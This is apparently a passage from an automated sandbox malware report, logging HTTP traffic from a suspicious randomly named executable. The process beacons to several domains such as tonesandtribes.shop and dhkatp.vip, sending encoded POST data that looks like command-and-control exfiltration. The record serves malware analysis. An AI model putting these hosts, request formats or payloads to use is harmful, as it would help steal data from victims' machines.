                                      Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                      Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.1249742217.70.184.50804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:33.729764938 CEST555OUTGET /hwgh/?Bz=dVmT&H2y4Q2Q8=p12lJFutXIXWecvX+pOy0qX/JeAxiBU6RDtVKqSTVTQfRACFjtYFw4mSuOp1Sp2gCjSvwjzXjhptyda5D5IzL2v6W/DloKvIiVUMOxSgv1qe9KALWIqXnK4= HTTP/1.1
                                      Host: www.ultraleap.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:37:34.398056030 CEST1236INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Sun, 22 Sep 2024 15:37:34 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Vary: Accept-Language
                                      Data Raw: 37 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 [TRUNCATED]
                                      Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>ultraleap.net</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
                                      Sep 22, 2024 17:37:34.398612022 CEST890INData Raw: 72 61 6c 65 61 70 2e 6e 65 74 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68
                                      Data Ascii: raleap.net"><strong>View the WHOIS results of ultraleap.net</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.124974352.223.13.41804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:39.688999891 CEST847OUTPOST /ypts/ HTTP/1.1
                                      Host: www.tonesandtribes.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.tonesandtribes.shop
                                      Referer: http://www.tonesandtribes.shop/ypts/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 42 4e 6b 6f 58 42 42 66 75 68 72 6c 41 76 77 30 5a 50 6f 62 4a 50 71 47 5a 74 47 57 4f 39 49 59 50 68 2b 6f 45 53 64 76 39 38 50 75 56 7a 67 53 75 50 4c 39 62 4e 71 63 4f 43 4c 37 74 6d 50 41 35 49 71 47 72 4e 45 37 59 77 70 4c 42 66 7a 35 50 62 57 39 72 4b 39 4e 36 30 6e 72 6f 63 45 35 42 61 50 55 78 4d 36 68 69 31 4f 2f 4b 39 44 75 59 38 73 72 67 34 59 4b 67 41 75 78 51 38 71 67 73 56 2b 59 78 61 48 51 6b 37 43 31 34 70 68 65 63 78 53 2f 32 41 58 55 38 35 6a 63 44 65 55 57 35 4a 37 66 30 74 54 52 32 52 64 43 75 6a 69 6d 76 62 43 56 7a 5a 33 6a 6c 69 42 43 62 4f 73 56 6b 51 3d 3d
                                      Data Ascii: H2y4Q2Q8=BNkoXBBfuhrlAvw0ZPobJPqGZtGWO9IYPh+oESdv98PuVzgSuPL9bNqcOCL7tmPA5IqGrNE7YwpLBfz5PbW9rK9N60nrocE5BaPUxM6hi1O/K9DuY8srg4YKgAuxQ8qgsV+YxaHQk7C14phecxS/2AXU85jcDeUW5J7f0tTR2RdCujimvbCVzZ3jliBCbOsVkQ==


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.124974452.223.13.41804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:42.260867119 CEST867OUTPOST /ypts/ HTTP/1.1
                                      Host: www.tonesandtribes.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.tonesandtribes.shop
                                      Referer: http://www.tonesandtribes.shop/ypts/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 42 4e 6b 6f 58 42 42 66 75 68 72 6c 41 50 41 30 65 73 51 62 50 76 71 42 54 4e 47 57 41 64 49 63 50 68 36 6f 45 54 6f 71 6f 65 72 75 55 53 51 53 76 4f 4c 39 63 4e 71 63 57 53 4c 2b 6e 47 50 48 35 49 6e 78 72 4d 55 37 59 77 39 4c 42 64 62 35 50 6f 75 36 70 61 39 50 38 30 6e 6c 73 63 45 35 42 61 50 55 78 50 48 47 69 31 57 2f 4c 4e 7a 75 5a 5a 4d 73 74 59 59 4e 33 77 75 78 55 38 72 49 73 56 2f 4c 78 62 62 71 6b 35 4b 31 34 73 4e 65 63 67 53 38 39 41 58 4f 68 70 69 75 54 37 39 76 7a 34 57 57 34 62 62 73 31 79 42 59 72 6c 7a 38 77 70 4b 44 6d 61 6a 75 6f 31 34 79 57 4e 52 63 2f 51 48 39 6a 76 4f 4e 6c 77 4a 50 2f 44 67 6a 73 53 79 37 30 6f 59 3d
                                      Data Ascii: H2y4Q2Q8=BNkoXBBfuhrlAPA0esQbPvqBTNGWAdIcPh6oEToqoeruUSQSvOL9cNqcWSL+nGPH5InxrMU7Yw9LBdb5Pou6pa9P80nlscE5BaPUxPHGi1W/LNzuZZMstYYN3wuxU8rIsV/Lxbbqk5K14sNecgS89AXOhpiuT79vz4WW4bbs1yBYrlz8wpKDmajuo14yWNRc/QH9jvONlwJP/DgjsSy70oY=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.124974552.223.13.41804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:44.800347090 CEST1880OUTPOST /ypts/ HTTP/1.1
                                      Host: www.tonesandtribes.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.tonesandtribes.shop
                                      Referer: http://www.tonesandtribes.shop/ypts/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 42 4e 6b 6f 58 42 42 66 75 68 72 6c 41 50 41 30 65 73 51 62 50 76 71 42 54 4e 47 57 41 64 49 63 50 68 36 6f 45 54 6f 71 6f 65 6a 75 55 68 59 53 75 74 6a 39 64 4e 71 63 65 79 4c 2f 6e 47 4f 43 35 49 2f 39 72 4a 4d 52 59 79 46 4c 42 38 37 35 4a 64 43 36 67 61 39 50 2b 30 6e 6b 6f 63 46 6a 42 61 66 51 78 4d 2f 47 69 31 57 2f 4c 50 72 75 51 73 73 73 2b 6f 59 4b 67 41 76 77 51 38 71 6c 73 56 32 2b 78 62 65 64 6b 49 71 31 2f 49 74 65 62 53 71 38 68 51 58 51 69 70 69 32 54 37 35 4f 7a 34 4c 74 34 62 48 43 31 31 74 59 6d 7a 32 4e 6b 4b 53 58 36 5a 44 59 6c 48 59 63 4e 2b 74 64 32 67 6e 6c 71 75 44 70 32 41 46 59 34 78 42 37 72 33 65 72 6f 64 72 53 34 34 64 70 78 33 47 51 30 48 37 68 50 51 38 79 67 70 4e 59 4e 35 65 51 35 6f 36 2b 56 57 42 4f 6d 76 74 39 59 61 6c 59 51 76 62 4b 74 4d 61 63 2b 63 75 51 59 76 78 42 4e 4a 34 61 4e 31 46 71 77 72 57 59 43 78 77 37 6e 46 69 78 69 37 4a 6e 70 75 44 2b 52 34 66 6e 48 76 46 74 44 51 39 64 59 55 4c 6c 76 59 6c 31 77 69 50 30 50 4d 72 6a 73 [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=BNkoXBBfuhrlAPA0esQbPvqBTNGWAdIcPh6oEToqoejuUhYSutj9dNqceyL/nGOC5I/9rJMRYyFLB875JdC6ga9P+0nkocFjBafQxM/Gi1W/LPruQsss+oYKgAvwQ8qlsV2+xbedkIq1/ItebSq8hQXQipi2T75Oz4Lt4bHC11tYmz2NkKSX6ZDYlHYcN+td2gnlquDp2AFY4xB7r3erodrS44dpx3GQ0H7hPQ8ygpNYN5eQ5o6+VWBOmvt9YalYQvbKtMac+cuQYvxBNJ4aN1FqwrWYCxw7nFixi7JnpuD+R4fnHvFtDQ9dYULlvYl1wiP0PMrjsElLPrq8ovIu02hQLTCTWu7faM5ces+oyDNl4S91l0OSiNYQoyg4WRkEl/onuvhSKMGbbrca1c42Y5hKsjYzfWzypqJ4+3+bc7ZlQ5034X6MxWfewqVXbpnL/m0fQSumOZRhaibs3ffsgfoxbTXmvz/Z0rSIeKU/fmFh5r3Gw7duuOH2cptn2b1Dl+bgh/Ql8BPPJbavZCtM/VKfvs1e5usPWGZ5l89V5NZFT+kideTK5pPoMhD5vXDO1NdIvIc6ZnYMykidE5jdL86yY56njD+BHDBzR6FBD1EJGBLWaeCTE5anfknlK2tQXBblq3FKOP9Kc+W4/ddAxIYipWWiTtJuTpFFBV3GAV5qpST/v1rwOMFi+DRSiZeEb3rFzH9QUE+CMCtBE7fMjEgd5w/pugv4eDEdxZHzPtyRxa0uldR3i70Xr9pmMs48xLWvVPQy+clKP7rYnFPwZrt1b7mmxuoky0HQtqQRUjSfsGOU0L3/WiHjiao0oD6yn/Aoi0PkMSOlf33UegznuZL6DYPf+Yn6EMosJIbQ5P4gDzQiVAd9HMTdkO8Afuxdod2+LimD4zs9tsrsxbLGSjBwNvgfC4kHd+XPTtNVEfdW+VLK1S02SHhE4C8ZV4inIqtsUAi2bEJRcK1oUSjiOTcnHzFE5bYKpBZ/VjN+dzC [TRUNCATED]


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.124974652.223.13.41804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:47.373486996 CEST561OUTGET /ypts/?H2y4Q2Q8=MPMIU0hHkBfsbulkVaJ8Jp6ZD/uXAfU8NFenCxNv7bndRQxHk/j1cej1UQn/jUnI0pmxvY0xPQ1pBcTmC5mqhat//XvfkcQ5Ye7wxcHRgAnUAfG8TdpZpIY=&Bz=dVmT HTTP/1.1
                                      Host: www.tonesandtribes.shop
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Sep 22, 2024 17:37:47.855192900 CEST392INHTTP/1.1 200 OK
                                      Server: openresty
                                      Date: Sun, 22 Sep 2024 15:37:47 GMT
                                      Content-Type: text/html
                                      Content-Length: 252
                                      Connection: close
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 32 79 34 51 32 51 38 3d 4d 50 4d 49 55 30 68 48 6b 42 66 73 62 75 6c 6b 56 61 4a 38 4a 70 36 5a 44 2f 75 58 41 66 55 38 4e 46 65 6e 43 78 4e 76 37 62 6e 64 52 51 78 48 6b 2f 6a 31 63 65 6a 31 55 51 6e 2f 6a 55 6e 49 30 70 6d 78 76 59 30 78 50 51 31 70 42 63 54 6d 43 35 6d 71 68 61 74 2f 2f 58 76 66 6b 63 51 35 59 65 37 77 78 63 48 52 67 41 6e 55 41 66 47 38 54 64 70 5a 70 49 59 3d 26 42 7a 3d 64 56 6d 54 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?H2y4Q2Q8=MPMIU0hHkBfsbulkVaJ8Jp6ZD/uXAfU8NFenCxNv7bndRQxHk/j1cej1UQn/jUnI0pmxvY0xPQ1pBcTmC5mqhat//XvfkcQ5Ye7wxcHRgAnUAfG8TdpZpIY=&Bz=dVmT"}</script></head></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.12497473.33.130.190804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:53.201939106 CEST820OUTPOST /9s2o/ HTTP/1.1
                                      Host: www.dhkatp.vip
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.dhkatp.vip
                                      Referer: http://www.dhkatp.vip/9s2o/
                                      Cache-Control: no-cache
                                      Content-Length: 205
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6b 70 2b 68 54 59 51 56 32 4b 5a 63 6d 6c 33 69 68 31 70 42 42 43 5a 48 51 33 70 4e 6b 62 39 77 6c 79 77 44 7a 55 34 68 6b 36 4a 41 4f 58 46 4f 62 7a 67 36 75 54 58 63 4e 63 76 4e 4e 4c 72 57 74 6d 6e 36 58 34 4b 2f 66 64 79 6e 36 55 7a 30 42 62 67 49 5a 55 68 6a 6c 38 6d 36 51 35 73 53 4c 70 50 73 54 50 47 6e 6a 49 2f 58 4b 74 48 6e 31 6f 4d 72 45 61 2b 57 41 4e 46 32 4e 55 75 4a 6a 70 33 51 2b 4a 59 55 75 57 5a 52 70 6c 72 63 68 79 49 6d 54 5a 34 76 73 33 70 74 4f 33 47 39 32 68 66 43 4a 64 70 7a 55 73 4d 33 70 31 51 38 70 61 45 39 33 70 6d 6c 43 39 33 34 79 43 70 4c 74 51 3d 3d
                                      Data Ascii: H2y4Q2Q8=kp+hTYQV2KZcml3ih1pBBCZHQ3pNkb9wlywDzU4hk6JAOXFObzg6uTXcNcvNNLrWtmn6X4K/fdyn6Uz0BbgIZUhjl8m6Q5sSLpPsTPGnjI/XKtHn1oMrEa+WANF2NUuJjp3Q+JYUuWZRplrchyImTZ4vs3ptO3G92hfCJdpzUsM3p1Q8paE93pmlC934yCpLtQ==


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      30192.168.2.12497483.33.130.190804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:55.766192913 CEST840OUTPOST /9s2o/ HTTP/1.1
                                      Host: www.dhkatp.vip
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.dhkatp.vip
                                      Referer: http://www.dhkatp.vip/9s2o/
                                      Cache-Control: no-cache
                                      Content-Length: 225
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6b 70 2b 68 54 59 51 56 32 4b 5a 63 6d 45 48 69 6e 53 39 42 45 69 5a 41 4f 6e 70 4e 75 37 39 30 6c 79 38 44 7a 56 38 78 6a 4a 74 41 4f 31 4e 4f 63 79 67 36 70 54 58 63 56 73 76 49 4a 4c 72 64 74 6d 71 50 58 36 4f 2f 66 5a 53 6e 36 52 58 30 42 71 67 4c 59 45 68 62 74 63 6d 34 64 5a 73 53 4c 70 50 73 54 4f 6a 77 6a 4d 54 58 4b 65 66 6e 30 4b 30 73 4e 36 2b 56 42 4e 46 32 4a 55 75 4e 6a 70 33 69 2b 49 30 74 75 55 52 52 70 68 76 63 6d 6d 63 6c 63 5a 34 74 7a 6e 70 7a 4f 31 37 79 32 6e 62 59 4d 75 70 51 54 76 30 41 6c 54 42 6d 32 6f 4d 72 69 71 79 6f 50 71 4f 49 2f 42 55 43 32 5a 2b 4b 75 46 4e 52 68 4f 42 4c 66 63 6c 79 50 70 74 2f 39 65 51 3d
                                      Data Ascii: H2y4Q2Q8=kp+hTYQV2KZcmEHinS9BEiZAOnpNu790ly8DzV8xjJtAO1NOcyg6pTXcVsvIJLrdtmqPX6O/fZSn6RX0BqgLYEhbtcm4dZsSLpPsTOjwjMTXKefn0K0sN6+VBNF2JUuNjp3i+I0tuURRphvcmmclcZ4tznpzO17y2nbYMupQTv0AlTBm2oMriqyoPqOI/BUC2Z+KuFNRhOBLfclyPpt/9eQ=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.12497493.33.130.190804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
                                      Sep 22, 2024 17:37:58.319055080 CEST1853OUTPOST /9s2o/ HTTP/1.1
                                      Host: www.dhkatp.vip
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.dhkatp.vip
                                      Referer: http://www.dhkatp.vip/9s2o/
                                      Cache-Control: no-cache
                                      Content-Length: 1237
                                      Connection: close
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
                                      Data Raw: 48 32 79 34 51 32 51 38 3d 6b 70 2b 68 54 59 51 56 32 4b 5a 63 6d 45 48 69 6e 53 39 42 45 69 5a 41 4f 6e 70 4e 75 37 39 30 6c 79 38 44 7a 56 38 78 6a 4a 6c 41 4f 48 31 4f 63 56 30 36 6f 54 58 63 4c 63 76 4a 4a 4c 72 36 74 6d 79 44 58 36 53 46 66 66 65 6e 37 33 62 30 48 59 49 4c 58 45 68 62 76 63 6d 35 51 35 73 39 4c 6f 2f 6f 54 50 54 77 6a 4d 54 58 4b 63 72 6e 7a 59 4d 73 4c 36 2b 57 41 4e 46 71 4e 55 75 31 6a 70 2f 49 2b 49 77 69 75 6c 78 52 73 31 4c 63 67 54 49 6c 44 70 34 7a 77 6e 6f 67 4f 31 32 79 32 6e 76 55 4d 74 31 71 54 6f 51 41 6d 47 38 58 31 49 4d 38 32 35 4b 59 64 35 6e 6d 2b 79 38 48 34 72 4b 75 72 6a 70 51 76 76 31 2f 56 72 55 6c 62 49 46 58 38 49 6d 4f 4a 71 42 55 4a 70 47 61 44 4f 4f 62 2f 41 6c 49 4a 43 54 73 34 6b 57 59 41 43 4f 78 4c 75 37 2f 30 2b 35 59 5a 74 77 6a 4e 32 2b 46 63 2b 4c 4d 50 6b 73 6f 77 2f 56 7a 41 37 4e 67 41 47 50 2f 69 44 52 51 34 53 57 63 64 72 34 44 45 78 70 65 70 73 78 7a 4c 42 78 7a 63 79 34 47 79 34 42 4d 30 4b 64 6a 54 49 55 2f 73 6d 56 38 35 34 30 49 77 [TRUNCATED]
                                      Data Ascii: H2y4Q2Q8=kp+hTYQV2KZcmEHinS9BEiZAOnpNu790ly8DzV8xjJlAOH1OcV06oTXcLcvJJLr6tmyDX6SFffen73b0HYILXEhbvcm5Q5s9Lo/oTPTwjMTXKcrnzYMsL6+WANFqNUu1jp/I+IwiulxRs1LcgTIlDp4zwnogO12y2nvUMt1qToQAmG8X1IM825KYd5nm+y8H4rKurjpQvv1/VrUlbIFX8ImOJqBUJpGaDOOb/AlIJCTs4kWYACOxLu7/0+5YZtwjN2+Fc+LMPksow/VzA7NgAGP/iDRQ4SWcdr4DExpepsxzLBxzcy4Gy4BM0KdjTIU/smV8540Iwoa6P6xkLcTVkpGkevfeZTm6B7goqDBjT/qCovLf9jGFVFtdXRy6HzHU6PpOQ5rCWufllN1tLGRrozvHa9bT03COUxgLqTYTR03V0aUMnvZGkAsSWWtSpH6VbMF+PQPF1I/b5ppWz9Nc8NfGWLmrTikqZFwKysEBbl56Oj5uyQjpQGzt4h0Pv76fpaEfWj57zVFJZYW6cnse99gTreHKpswsF/ZjEvyUCO1q23yx+nC2IE2XBM3vZsTcqloWVIC75r9MmQQQMw8AWWm+WovZjuOorz5wBxHoGpusc2qcy5kpcaQx8iORpWoAG8WA+0C5I02BuRJ/q0LSwgjvxvk0xdL8KfcZOwRWTZ/sKkdSAp6ekdIJ3QMdvekK4Zl8IDeBZDd/FFeX00/1ZbmNw3PtOF8j2od7wNbCj5ltvpyYJ9qW8xsNKZckVwlIn18RHd3Qt23lfvGb/M2jj54hHCPbMtdT3w+kXniS3Llq7uIhOGBmfs9dvfh7F+nbABe2BarC61CllQtP2+uMLZn6jdPfezcybozR7H4e0bW4Heyzlqr1efEqnyj/M5cjbYzUvxJamrrSpeioqHzy97aC0jQ9SVWU/IK9xXq6W8z9vAUoZREnHiB0PEsteTyLTGKKwJS5nbgFHXrm+15q1qEolAbL/IU0SnlPWFYMwS1 [TRUNCATED]


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.12497503.33.130.190804544C:\Program Files (x86)\ZhlQzquTajtiLqBCvLYgtCIsdoMHzHtZZfoyvPLwCpFnxVRoEgfIfUXGJnCCgDHbImlRaAz\dgGgsACWgP.exe
                                      TimestampBytes transferredDirectionData
